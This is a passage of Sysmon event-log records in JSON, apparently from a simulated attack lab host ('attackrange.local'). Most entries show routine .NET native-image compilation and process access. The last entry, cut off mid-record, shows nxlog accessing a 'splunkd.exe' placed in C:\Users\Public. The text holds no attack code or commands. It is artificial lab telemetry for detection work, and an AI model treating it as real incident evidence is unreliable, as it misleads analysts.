{"EventTime":"2020-08-01 07:01:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8013,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:21.044\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1341-5F25-0000-00100F880D00}\r\nTargetProcessId: 5032\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:21.044","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1341-5F25-0000-00100F880D00}","TargetProcessId":"5032","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8014,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:01:21.075\r\nProcessGuid: {E2A3D6B1-1341-5F25-0000-00100F880D00}\r\nProcessId: 5032\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\13a8-0\\PresentationFramework-SystemXmlLinq.dll\r\nCreationUtcTime: 2020-08-01 07:01:21.075","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:01:21.075","ProcessGuid":"{E2A3D6B1-1341-5F25-0000-00100F880D00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\13a8-0\\PresentationFramework-SystemXmlLinq.dll","CreationUtcTime":"2020-08-01 07:01:21.075","EventReceivedTime":"2020-08-01 07:01:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8015,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:21.106\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-133E-5F25-0000-0010A42A0D00}\r\nTargetProcessId: 3216\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:21.106","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-133E-5F25-0000-0010A42A0D00}","TargetProcessId":"3216","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8016,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:21.106\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-133E-5F25-0000-0010A42A0D00}\r\nTargetProcessId: 3216\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:21.106","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-133E-5F25-0000-0010A42A0D00}","TargetProcessId":"3216","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8017,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:21.122\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1341-5F25-0000-00102A8C0D00}\r\nTargetProcessId: 3216\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:21.122","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1341-5F25-0000-00102A8C0D00}","TargetProcessId":"3216","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8018,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:21.185\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-133E-5F25-0000-0010832E0D00}\r\nTargetProcessId: 5008\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:21.185","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-133E-5F25-0000-0010832E0D00}","TargetProcessId":"5008","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8019,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:21.185\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-133E-5F25-0000-0010832E0D00}\r\nTargetProcessId: 5008\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:21.185","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-133E-5F25-0000-0010832E0D00}","TargetProcessId":"5008","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8020,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:21.200\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1341-5F25-0000-0010BD8F0D00}\r\nTargetProcessId: 5008\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:21.200","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1341-5F25-0000-0010BD8F0D00}","TargetProcessId":"5008","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8021,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:01:21.638\r\nProcessGuid: {E2A3D6B1-1341-5F25-0000-0010BD8F0D00}\r\nProcessId: 5008\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1390-0\\PresentationFramework.Aero.dll\r\nCreationUtcTime: 2020-08-01 07:01:21.638","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:01:21.638","ProcessGuid":"{E2A3D6B1-1341-5F25-0000-0010BD8F0D00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1390-0\\PresentationFramework.Aero.dll","CreationUtcTime":"2020-08-01 07:01:21.638","EventReceivedTime":"2020-08-01 07:01:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8022,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:21.638\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 